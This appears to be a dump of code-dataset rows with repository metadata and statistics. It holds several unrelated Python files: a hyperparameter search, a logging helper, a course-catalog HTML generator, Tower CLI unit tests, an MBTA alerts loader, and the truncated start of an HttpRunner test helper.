| 29.863309 | 89 | 0.642255 | 551 | 4,151 | 4.720508 | 0.330309 | 0.039985 | 0.004614 | 0.019608 | 0.119569 | 0.069589 | 0.041138 | 0.041138 | 0.041138 | 0.041138 | 0 | 0.02262 | 0.233197 | 4,151 | 138 | 90 | 30.07971 | 0.794533 | 0.317755 | 0 | 0.056338 | 0 | 0 | 0.071243 | 0.008905 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042254 | false | 0 | 0.112676 | 0 | 0.183099 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f9b4599ddcdfb832a2be6e8ad579044c33aff5 | 7,052 | py | Python | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | """
Hyper-parameter search based on basian optimizers (Gaussin process)
scikit learn library skopt is implements the optimizer.
We build on top of it, the easy to execute hyper-parameter setting
before we star the full-blown training.
"""
import skopt
from skopt import gp_minimize, forest_minimize
from skopt.space import Real, Categorical, Integer
from skopt.plots import plot_convergence
from skopt.plots import plot_objective, plot_evaluations
#from skopt.plots import plot_histogram, plot_objective_2D
from skopt.utils import use_named_args
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import math
import os
import sys
import importlib
def get_hyper_parameters(version, project_path, get_param_space = True):
import hyperparameter.hyperparameter as hp
hp_obj = hp.HyperParameters(version, project_path)
param_dict = hp_obj.get_params()
if get_param_space:
param_dict_space = hp_obj.get_param_space()
return param_dict, param_dict_space
else:
return param_dict
def set_hyper_parameter(version, project_path, dict):
import hyperparameter.hyperparameter as hp
hp_obj = hp.HyperParameters(version, project_path)
for key, value in dict.items():
hp_obj.set_parameter(key, value)
hp_obj.dump_parameter()
default_param_name = []
default_param_value = []
space_dimensions = []
args = None
def sanity_check(param_dict, param_dict_space):
global default_param_name
global default_param_value
global space_dimensions
for key, value in param_dict.items():
if key in param_dict_space.keys():
default_param_name.append(key)
default_param_value.append(value)
param_space = param_dict_space[key]
if param_space["type"] == "Int":
temp_skopt_var = Integer(low=param_space["low"], high=param_space["high"], name=str(key))
elif param_space["type"] == "Real":
temp_skopt_var = Real(low=param_space["low"], high=param_space["high"], prior=param_space["prior"], name=str(key))
else:
temp_skopt_var = Categorical(categories=param_space["catagories"], name=str(key))
space_dimensions.append(temp_skopt_var)
else:
print(key + " has no space defined in param_space")
return
#TODO create a dataprovider that works on a sample of data
def get_data_provider(dataset, project_path, param_dict):
data_provider_module_path = "dataset." + dataset + ".data_provider"
data_provider_module = importlib.import_module(data_provider_module_path)
dp_obj = data_provider_module.get_obj(project_path)
with tf.name_scope('input'):
img_batch = tf.placeholder(tf.float32, [None, 28, 28, 1])
with tf.name_scope('output'):
label_batch = tf.placeholder(tf.int64, [None, 10])
return img_batch, label_batch, dp_obj
def get_model(version, inputs, param_dict):
model_module_path = "architecture.version" + str(version) + ".model"
model_module = importlib.import_module(model_module_path)
model = model_module.create_model(inputs, param_dict)
return model
def optimisation(label_batch, logits, param_dict):
with tf.name_scope('loss'):
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
labels=label_batch, logits=logits))
tf.summary.scalar('loss', loss_op)
with tf.name_scope('gradient_optimisation'):
gradient_optimizer_op = tf.train.AdamOptimizer(param_dict['learning_rate'])
gd_opt_op = gradient_optimizer_op.minimize(loss_op)
return loss_op, gd_opt_op
def accuracy(predictions, labels):
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(predictions, 1), tf.argmax(labels,1))
accuracy = 100*tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
return accuracy
def mk_dir(path):
if not os.path.isdir(path):
os.mkdir(path)
def log_file_suffix(params):
file_suffix = ""
for elem in params:
file_suffix = file_suffix + "_" + str(elem)
return file_suffix
def fitness(param_space_values):
# Here we re-create the param dictionary
project_path = os.getcwd()
param_dict = {}
for i in range(len(param_space_values)):
param_dict[default_param_name[i]] = param_space_values[i]
# Rest of the parameter lies in param.txt
param_dict_original = get_hyper_parameters(args.param, project_path, False)
for key, value in param_dict_original.items():
if key not in param_dict.keys():
param_dict[key] = value
########### param_dict creation complete ################
# Define the data provider module
img_batch, label_batch, dp = get_data_provider(args.dataset, project_path, param_dict)
dp.set_batch(param_dict['BATCH_SIZE'])
# Construct a model to be trained
model = get_model(args.model, img_batch, param_dict)
# Define optimization procedure
logits = model['feature_logits']
output_probability = model['feature_out']
loss_op, gd_opt_op = optimisation(label_batch, logits, param_dict)
# Define accuracy operation
accuracy_op = accuracy(output_probability, label_batch)
# Merge all summaries
summary_op = tf.summary.merge_all()
summary_path = project_path + "/debug/opt_" + str(args.model) + \
"_" + str(args.param) + "_" + args.dataset
# Start a session
with tf.Session() as sess:
train_writer = tf.summary.FileWriter(summary_path + '/' + log_file_suffix(param_space_values), sess.graph)
sess.run(tf.global_variables_initializer())
for nr_epochs in range(param_dict['NUM_EPOCHS']):
for i in range(5):
img_batch_data, label_batch_data = dp.next()
feed_dict = {img_batch: img_batch_data, label_batch: label_batch_data}
_, out, loss, accu, summary = sess.run([gd_opt_op,output_probability,loss_op, accuracy_op, summary_op], feed_dict = feed_dict)
train_writer.add_summary(summary, nr_epochs*10 + i)
train_writer.close()
tf.reset_default_graph()
print(accu)
return -accu
def execute(arguments):
global args
args = arguments
project_path = os.getcwd()
param_dict, param_dict_space = get_hyper_parameters(args.param, project_path)
sanity_check(param_dict, param_dict_space)
if not default_param_name:
print("Fix your param, exiting")
sys.exit()
search_result = gp_minimize(func=fitness,
dimensions=space_dimensions,
acq_func='EI',
n_calls=20,
x0=default_param_value)
print("Best parameters has been searched")
best_results = search_result.x
param_dict_opt = param_dict
for i in range(len(default_param_name)):
param_dict_opt[default_param_name[i]] = best_results[i]
set_hyper_parameter(args.param, project_path, param_dict_opt)
| 41.239766 | 142 | 0.698242 | 960 | 7,052 | 4.836458 | 0.254167 | 0.067844 | 0.021107 | 0.016153 | 0.19384 | 0.124704 | 0.089166 | 0.048245 | 0.033599 | 0.033599 | 0 | 0.004471 | 0.207033 | 7,052 | 170 | 143 | 41.482353 | 0.825823 | 0.0865 | 0 | 0.064286 | 0 | 0 | 0.049234 | 0.003282 | 0 | 0 | 0 | 0.005882 | 0 | 1 | 0.078571 | false | 0 | 0.121429 | 0 | 0.264286 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5fadfef73f91b4b1d12fd13f34f96e38ed68ff7 | 2,105 | py | Python | mop/vendor/node_calculator/logger.py | HolisticCoders/mop | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 8 | 2019-09-21T07:17:54.000Z | 2022-02-09T03:33:24.000Z | mop/vendor/node_calculator/logger.py | ProjectBorealis/master-of-puppets | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 102 | 2019-01-10T21:00:28.000Z | 2019-03-28T11:32:45.000Z | mop/vendor/node_calculator/logger.py | HolisticCoders/mop | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 3 | 2020-01-12T01:37:34.000Z | 2021-10-08T11:34:08.000Z | """Module for logging.
:author: Mischa Kolbe <mik@dneg.com>
:credits: Steven Bills, Mischa Kolbe
"""
import logging
import logging.handlers
log = logging.getLogger(__name__)
# Make sure logs don't propagate through to __main__ logger, too
# This might be a Maya-issue. I don't think this should be necessary!
log.propagate = False
FORMAT_STR = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
FORMATTER = logging.Formatter(FORMAT_STR, "%m/%d/%Y %H:%M:%S")
class NullHandler(logging.Handler):
"""Basic custom logging handler."""
def emit(self, record):
pass
def clear_handlers():
"""Reset handlers of logger.
Note:
This prevents creating multiple handler copies when using reload(logger).
"""
log.handlers = []
null_handler = NullHandler()
log.addHandler(null_handler)
def setup_stream_handler(level=logging.INFO):
"""Create a stream handler for logging.
Note:
Logging levels are: DEBUG, INFO, WARN, ERROR, CRITICAL
Args:
level (int): Desired logging level. Default is logging.INFO.
"""
strmh = logging.StreamHandler()
strmh.setFormatter(FORMATTER)
strmh.setLevel(level)
log.addHandler(strmh)
if log.getEffectiveLevel() > level:
log.setLevel(level)
def setup_file_handler(file_path, max_bytes=100 << 20, level=logging.INFO):
"""Creates a rotating file handler for logging.
Default level is info.
Args:
file_path (str): Path where to save the log to.
max_bytes (int): Maximum size of output file.
level (int): Desired logging level. Default is logging.INFO.
max_bytes:
x << y Returns x with the bits shifted to the left by y places. 100 << 20 === 100 * 2 ** 20
"""
file_handler = logging.handlers.RotatingFileHandler(
file_path,
maxBytes=max_bytes,
backupCount=10
)
file_handler.setFormatter(FORMATTER)
file_handler.setLevel(level)
log.addHandler(file_handler)
if log.getEffectiveLevel() > level:
log.setLevel(level)
log.info("Log file: {0}".format(file_path))
| 25.361446 | 95 | 0.671259 | 275 | 2,105 | 5.032727 | 0.447273 | 0.047688 | 0.034682 | 0.031792 | 0.130058 | 0.130058 | 0.130058 | 0.067919 | 0.067919 | 0 | 0 | 0.011543 | 0.218052 | 2,105 | 82 | 96 | 25.670732 | 0.829283 | 0.422328 | 0 | 0.125 | 0 | 0 | 0.073149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.03125 | 0.0625 | 0 | 0.21875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5fbbbfef06dbcd8508e8e7c4079399f3e8df5f6 | 10,157 | py | Python | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | """ @author: Alex Nguyen
@file: template_v2.py
This file work extract the information from the template
"""
import os
from typing import Dict, List
import bs4
from bs4 import BeautifulSoup
from datetime import date
from .const import *
from .page import Page
from .utils import load_json_locators, request_json_from_api
from .explorer import CourseExplorer, CoursePage, CoursePage_v2
class Template:
""" This class is the template extractor
"""
def __init__(
self,
template_path: str,
locators_path: str,
course_crawling_mode=COURSE_CRAWLING_MODE.raw,
course_explorer: CourseExplorer = None,
data_path: str=None,
verbose=True
) -> None:
""" initializer
Args:
template_path (str): Path to template file. Defaults to '../data/template.html'.
"""
self.template_path = template_path
self.locators_path = locators_path
self.n_links = 0
self.toc: str = ""
self.pages = []
self.title = ""
self.course_crawling_mode = course_crawling_mode # either "api" or "raw"
self.course_explorer = course_explorer
self.verbose = verbose
self.locators_data = self.__load_locators()
self.template_src = self.__read_template_file(self.template_path)
self.data_path = data_path
if not os.path.exists(data_path):
os.mkdir(data_path)
# The actual data
self.id_to_page: Dict[str, Page] = {}
def __read_template_file(self, path) -> str:
src = ""
with open(path, "rb") as f:
src = f.read()
if not src:
if self.verbose:
print("Cannot read template file")
return None
return src
def __load_locators(self) -> Dict:
data = load_json_locators(self.locators_path)
# TODO: check if locators is a proper structure
if data:
return data
return None
def insight(self):
# TODO: Currently reaching maximum recursion depth, CAUSING ERROR
# id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
# # If the data exists, no need to crawl any more
# if os.path.exists(id_to_page_path):
# with open(id_to_page_path, "rb") as f:
# self.id_to_page = pickle.load(f)
# print("The data exists, simply load the data.")
# return
soup = BeautifulSoup(self.template_src, 'html.parser')
header_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("header")
toc_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("nav")
all_content_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("main")
for i, section in enumerate(all_content_soup.find_all("section")):
# Loop through every elements
first_tag_pointer = section.find_all()[0]
current_page_header: bs4.BeautifulSoup = first_tag_pointer
for j, tag in enumerate(first_tag_pointer.find_next_siblings()):
# print(f"section: {i}, tag {j}: {tag}")
# If it is contained in a div, then it is a link
if tag.name == 'div':
assert "id" in current_page_header.attrs, "Unexpected error: Wrong current_page_header behavior!"
# Get the code html tag that contain the link for content to be replaced there!
url_code_block = tag.find("code")
# Because there can be a short_version text that does not require ontent to be there, we don't necessarily force
# it to always having the link there.
if url_code_block != None:
url = url_code_block.find("a") # Get the first and only link in the code html block
# Create a page
this_page = Page(
page_tag=PAGE_TAG.COURSE_PROG,
html_id=current_page_header["id"],
header_level=current_page_header.name,
locators_data=self.locators_data,
url=url["href"]
)
self.id_to_page[current_page_header["id"]] = this_page
if self.verbose:
print(this_page)
# Otherwise, it is a header
else:
current_page_header = tag
# print(current_page_header)
# Save the pickle serialized data inside the data folder
# TODO: Currently reaching maximum recursion depth, CAUSING ERROR
# self.__save_id_to_page_data()
def clear_cached_data(self):
id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
if os.path.exists(id_to_page_path):
os.remove(id_to_page_path)
def __save_id_to_page_data(self):
id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
with open(id_to_page_path, "wb") as f:
pickle.dump(self.id_to_page, f)
def show_temporary_result(self) -> None:
""" Show the user the webdriver of the resulted generated website
"""
# Driver - which can show the website temporarily using seleniums - class involved?
pass
def generate(self) -> str:
soup = BeautifulSoup(self.template_src, 'html.parser')
header_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("header")
toc_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("nav")
all_content_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("main")
for i, section in enumerate(all_content_soup.find_all("section")):
# Loop through every elements
first_tag_pointer = section.find_all()[0]
current_course_subject: str = None
current_page_header: bs4.BeautifulSoup = first_tag_pointer
for j, tag in enumerate(first_tag_pointer.find_next_siblings()):
# If it is contained in a div, then it is a link
if tag.name == 'div':
if current_page_header.text.strip().split()[-1] == "Courses": # If it is courses crawling, then we have two cases
if self.course_crawling_mode == COURSE_CRAWLING_MODE.api:
# TODO: Working on course crawling api here
# Exclude the link
tag_link = tag.find("code")
# if there is no link (`code` html tag, we can concatenate that content to
# the current tag, and continue)
if tag_link == None:
continue
# do work
tag_link.extract()
# CoursePage v1, create course page based on the subject name
# Create a new course page (department name)
# NOTE: CoursePage v1 deprecated.
# course_page = CoursePage(subject_name=current_course_subject, data=self.course_explorer.data)
# CoursePage v2, create course page based on list of subject area abbreviation
# First of all, get all the subject abbreviation in the content page
subject_abbrs: List[str] = self.id_to_page[current_page_header["id"]].get_subject_abbrs()
# Second, get from the actual page content
course_page_v2 = CoursePage_v2(subject_abbrs=subject_abbrs, data=self.course_explorer.data)
# for page_child_tag in course_page.gen_all_courses_for_this_subject().find_all(recursive=False):
# tag.append(page_child_tag)
for page_child_tag in course_page_v2.gen_all_courses_for_this_subject().find_all(recursive=False):
tag.append(page_child_tag)
elif self.course_crawling_mode == COURSE_CRAWLING_MODE.raw:
# We are generating based on raw html crawled pages
if current_page_header["id"] in self.id_to_page.keys():
# Exclude the link
tag_link = tag.find("code")
tag_link.extract()
# Append the content of that page into the children list of the tag
# tag.append(self.id_to_page[current_page_header["id"]].generate())
# Append each piece of the content of that page into the children list of the tag
for page_child_tag in self.id_to_page[current_page_header["id"]].generate().find_all(recursive=False):
tag.append(page_child_tag)
else: # else, we have one case!
if current_page_header["id"] in self.id_to_page.keys():
# Exclude the link
tag_link = tag.find("code")
tag_link.extract()
# Append the content of that page into the children list of the tag
# tag.append(self.id_to_page[current_page_header["id"]].generate())
# Append each piece of the content of that page into the children list of the tag
for page_child_tag in self.id_to_page[current_page_header["id"]].generate().find_all(recursive=False):
tag.append(page_child_tag)
# Otherwise, it is a header
else:
current_page_header = tag
# print(self.course_explorer.subjects_dict)
# print(f"Searching {tag.text.strip()} to {self.course_explorer.subjects_dict.keys()} => {tag in self.course_explorer.subjects_dict.keys()}")
if tag.text.strip() in self.course_explorer.subjects_dict.keys():
current_course_subject = tag.text.strip()
# print(current_course_subject)
original_html_string = \
"""
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8" />
<title>Gettysburg College Course Catalog 2021–2022</title>
</head>
<body></body>
</html>
"""
main_soup = BeautifulSoup(original_html_string, "html.parser")
# Modify the date variable header_soup
# https://www.programiz.com/python-programming/datetime/current-datetime
today = date.today()
# Textual month, day and year
today_string = today.strftime(r"%B %d, %Y")
header_soup_content_list = header_soup.find("section").find_all(recursive=False)
header_soup_content_list[len(header_soup_content_list) - 1].string = f" generated on {today_string}."
main_soup.body.append(header_soup)
main_soup.body.append(toc_soup)
main_soup.body.append(all_content_soup)
return main_soup
| 39.216216 | 151 | 0.653146 | 1,382 | 10,157 | 4.559334 | 0.198263 | 0.013331 | 0.026662 | 0.024758 | 0.466116 | 0.431519 | 0.419775 | 0.374068 | 0.334074 | 0.334074 | 0 | 0.003437 | 0.255292 | 10,157 | 259 | 152 | 39.216216 | 0.829455 | 0.314857 | 0 | 0.320611 | 0 | 0 | 0.047228 | 0 | 0 | 0 | 0 | 0.007722 | 0.007634 | 1 | 0.061069 | false | 0.007634 | 0.068702 | 0 | 0.175573 | 0.015267 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680131fc1bf24ebbce1221dc1343787c98373c6a | 8,140 | py | Python | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 7 | 2020-05-05T14:42:57.000Z | 2020-12-15T11:22:08.000Z | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 5 | 2020-05-19T12:34:51.000Z | 2020-08-05T11:14:17.000Z | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 2 | 2020-09-14T09:12:19.000Z | 2021-04-13T10:11:22.000Z | import re
import tempfile
import textwrap
from unittest import mock
import click
import pytest
import yaml
from atacac import _utils
@pytest.mark.parametrize(
"level, fatal",
[
pytest.param("info", True, id="level='info', fatal"),
pytest.param("INFO", True, id="level='INFO', fatal"),
pytest.param("info", False, id="level='info'"),
pytest.param("INFO", False, id="level='INFO'"),
pytest.param("warn", True, id="level='warn', fatal"),
pytest.param("WARN", True, id="level='WARN', fatal"),
pytest.param("warn", False, id="level='warn'"),
pytest.param("WARN", False, id="level='WARN'"),
pytest.param("warning", True, id="level='warning', fatal"),
pytest.param("WARNING", True, id="level='WARNING', fatal"),
pytest.param("warning", False, id="level='warning'"),
pytest.param("WARNING", False, id="level='WARNING'"),
pytest.param("error", True, id="level='error', fatal"),
pytest.param("ERROR", True, id="level='ERROR', fatal"),
pytest.param("error", False, id="level='error'"),
pytest.param("ERROR", False, id="level='ERROR'"),
pytest.param("debug", True, id="level='debug', fatal"),
pytest.param("DEBUG", True, id="level='DEBUG', fatal"),
pytest.param("debug", False, id="level='debug'"),
pytest.param("DEBUG", False, id="level='DEBUG'"),
]
)
@mock.patch("atacac._utils.textwrap")
@mock.patch("atacac._utils.click")
def test_log(mock_click, mock_textwrap, level, fatal):
message = "This is a message."
mock_click.Abort = click.Abort
mock_click.style.return_value = level
mock_textwrap.indent.return_value = f"{level} {message}"
try:
_utils.log(level, message, fatal=fatal)
mock_click.echo.assert_called_once()
mock_click.echo.assert_called_with(f"{level} {message}")
except click.Abort:
assert fatal is True
@pytest.mark.parametrize(
"error, asset_type, query",
[
pytest.param(None, "user", ("label", 1), id="user"),
pytest.param(None, "organization", ("label", 1), id="organization"),
pytest.param(None, "team", ("label", 1), id="team"),
pytest.param(None, "credential_type", ("label", 1), id="credential_type"),
pytest.param(None, "credential", ("label", 1), id="credential"),
pytest.param(None, "notification_template", ("label", 1), id="notification_template"),
pytest.param(None, "inventory_script", ("label", 1), id="inventory_script"),
pytest.param(None, "project", ("label", 1), id="project"),
pytest.param(None, "inventory", ("label", 1), id="inventory"),
pytest.param(None, "job_template", ("label", 1), id="job_template"),
pytest.param(None, "workflow", ("label", 1), id="workflow"),
pytest.param("Unsupported asset type 'ABC123XYZ'!",
"ABC123XYZ", ("label", 1), id="unsupported asset type")
]
)
@mock.patch("tower_cli.get_resource")
def test_tower_list(mock_get_resource, error, asset_type, query):
result_assets = [{"id": 1, "name": "foo"}, {"id": 2, "name": "bar"}]
mock_instance = mock_get_resource.return_value
mock_instance.list.return_value = {"results": result_assets}
try:
retval = _utils.tower_list(asset_type, query)
except _utils.Error as e:
assert str(e) == error
assert e.error_code == 1
else:
mock_get_resource.assert_called_once()
mock_get_resource.assert_called_with(asset_type)
mock_instance.list.assert_called_once()
mock_instance.list.assert_called_with(all_pages=True, query=("label", 1))
assert retval == result_assets
@mock.patch("atacac._utils.tower_receive")
@mock.patch("atacac._utils.tower_list")
def test_tower_list_all(mock_tower_list, mock_tower_receive):
def tower_list(asset_type, query):
return [{'id': 1, 'name': f'Example {asset_type}'}]
mock_tower_list.side_effect = tower_list
mock_tower_receive.return_value = [
{
'project': 'Example project',
'inventory': 'Example inventory',
},
]
result = _utils.tower_list_all([('label', 1)])
assert list(sorted(result, key=lambda i: i['name'])) == [
{'id': 1, 'type': 'inventory', 'name': 'Example inventory'},
{'id': 1, 'type': 'job_template', 'name': 'Example job_template'},
{'id': 1, 'type': 'project', 'name': 'Example project'},
]
mock_tower_list.assert_has_calls([
mock.call('job_template', [('label', 1)]),
mock.call('project', [('name', 'Example project')]),
mock.call('inventory', [('name', 'Example inventory')]),
])
@pytest.mark.parametrize(
"error, asset_type, asset_name",
[
pytest.param(None, "user", "file", id="user"),
pytest.param(None, "organization", "file", id="organization"),
pytest.param(None, "team", "file", id="team"),
pytest.param(None, "credential_type", "file", id="credential_type"),
pytest.param(None, "credential", "file", id="credential"),
pytest.param(None, "notification_template", "file", id="notification_template"),
pytest.param(None, "inventory_script", "file", id="inventory_script"),
pytest.param(None, "project", "file", id="project"),
pytest.param(None, "inventory", "file", id="inventory"),
pytest.param(None, "job_template", "file", id="job_template"),
pytest.param(None, "workflow", "file", id="workflow"),
pytest.param("Unsupported asset type 'ABC123XYZ'!",
"ABC123XYZ", "file", id="unsupported asset type")
]
)
@mock.patch("atacac._utils.Receiver")
def test_tower_receive(mock_Receiver, error, asset_type, asset_name):
dictionary = {"dictA": {"key_1": "value_1"}, "dictB": {"key_2": "value_2"}}
mock_instance = mock_Receiver.return_value
mock_instance.export_assets.return_value = dictionary
try:
assert _utils.tower_receive(asset_type, asset_name) == dictionary
except _utils.Error as e:
assert str(e) == error
assert e.error_code == 1
else:
mock_Receiver.assert_called_once()
mock_instance.export_assets.assert_called_once()
mock_instance.export_assets.assert_called_with(all=False, asset_input={asset_type: [asset_name]})
@pytest.mark.parametrize(
"assets",
[
pytest.param("foo", id="file"),
pytest.param(["foo", "bar"], id="file list"),
]
)
@mock.patch("atacac._utils.Sender")
def test_tower_send(mock_Sender, assets):
mock_instance = mock_Sender.return_value
_utils.tower_send(assets)
mock_Sender.assert_called_once()
mock_Sender.assert_called_with(False)
mock_instance.send.assert_called_once()
mock_instance.send.assert_called_with(
assets if isinstance(assets, list) else [assets], None, None, "default")
def test_load_asset_valid_path():
file_data = textwrap.dedent(
"""\
---
key_a:
key_i: foo
key_j: 111
key_b:
key_x: bar
key_y: 222
"""
)
with tempfile.NamedTemporaryFile() as tmpfile:
tmpfile.write(bytes(file_data, encoding="utf-8"))
tmpfile.seek(0)
result = _utils.load_asset(tmpfile.name)
assert result == yaml.safe_load(file_data)
def test_load_asset_invalid_path():
try:
_utils.load_asset("./a/b/c/d/e/f/g/h/i/file")
except _utils.Error as e:
assert re.match(r"^Failed to read content of '\./a/b/c/d/e/f/g/h/i/file'$", str(e))
assert e.error_code == 1
@pytest.mark.parametrize(
"value, sanitized",
[
pytest.param('foo_bar.yml', 'foo_bar.yml'),
pytest.param('foo/bar.yml', 'foo_bar.yml'),
pytest.param('foo///bar.yml', 'foo_bar.yml'),
pytest.param('foo.bar.yml', 'foo.bar.yml'),
pytest.param('foo-bar.yml', 'foo-bar.yml'),
pytest.param('foo bar baz foo bar.job.yml', 'foo_bar_baz_foo_bar.job.yml'),
]
)
def test_sanitize(value, sanitized):
assert _utils.sanitize_filename(value) == sanitized
| 35.545852 | 105 | 0.625799 | 1,028 | 8,140 | 4.763619 | 0.142996 | 0.116806 | 0.067388 | 0.028589 | 0.556872 | 0.446396 | 0.373902 | 0.260363 | 0.239126 | 0.155401 | 0 | 0.007393 | 0.202334 | 8,140 | 228 | 106 | 35.701754 | 0.746804 | 0 | 0 | 0.117978 | 0 | 0.005618 | 0.255814 | 0.035009 | 0 | 0 | 0 | 0 | 0.146067 | 1 | 0.050562 | false | 0 | 0.044944 | 0.005618 | 0.101124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680265a46b2454e377941d3516c73e1d1910e868 | 1,010 | py | Python | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 1 | 2020-03-06T02:09:02.000Z | 2020-03-06T02:09:02.000Z | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 11 | 2019-11-21T23:12:53.000Z | 2019-11-22T02:26:48.000Z | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 1 | 2020-03-06T02:12:23.000Z | 2020-03-06T02:12:23.000Z | import json
from chalicelib import MbtaPerformanceAPI, s3
def routes_for_alert(alert):
routes = set()
try:
for alert_version in alert["alert_versions"]:
for informed_entity in alert_version["informed_entity"]:
if "route_id" in informed_entity:
routes.add(informed_entity["route_id"])
except KeyError as e:
print(f"Handled KeyError: Couldn't access {e} from alert {alert}")
return routes
def key(day):
return f"Alerts/{str(day)}.json.gz"
def get_alerts(day, routes):
alerts_str = s3.download(key(day), "utf8")
alerts = json.loads(alerts_str)[0]["past_alerts"]
def matches_route(alert):
targets = routes_for_alert(alert)
return any(r in targets for r in routes)
return list(filter(matches_route, alerts))
def store_alerts(day):
api_data = MbtaPerformanceAPI.get_api_data("pastalerts", {}, day)
alerts = json.dumps(api_data).encode("utf8")
s3.upload(key(day), alerts, True)
| 27.297297 | 74 | 0.665347 | 138 | 1,010 | 4.695652 | 0.413043 | 0.061728 | 0.04321 | 0.058642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007614 | 0.219802 | 1,010 | 36 | 75 | 28.055556 | 0.814721 | 0 | 0 | 0 | 0 | 0 | 0.153465 | 0.024752 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.08 | 0.04 | 0.44 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68049a81228436d30d12cebcbf7ce433b752d03b | 1,415 | py | Python | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | import hashlib
import hmac
import json
import os
import random
import string
import time
try:
string_type = basestring
PYTHON_VERSION = 2
import urllib
except NameError:
string_type = str
PYTHON_VERSION = 3
import urllib.parse as urllib
SECRET_KEY = "DebugTalk"
BASE_URL = "http://127.0.0.1:5000"
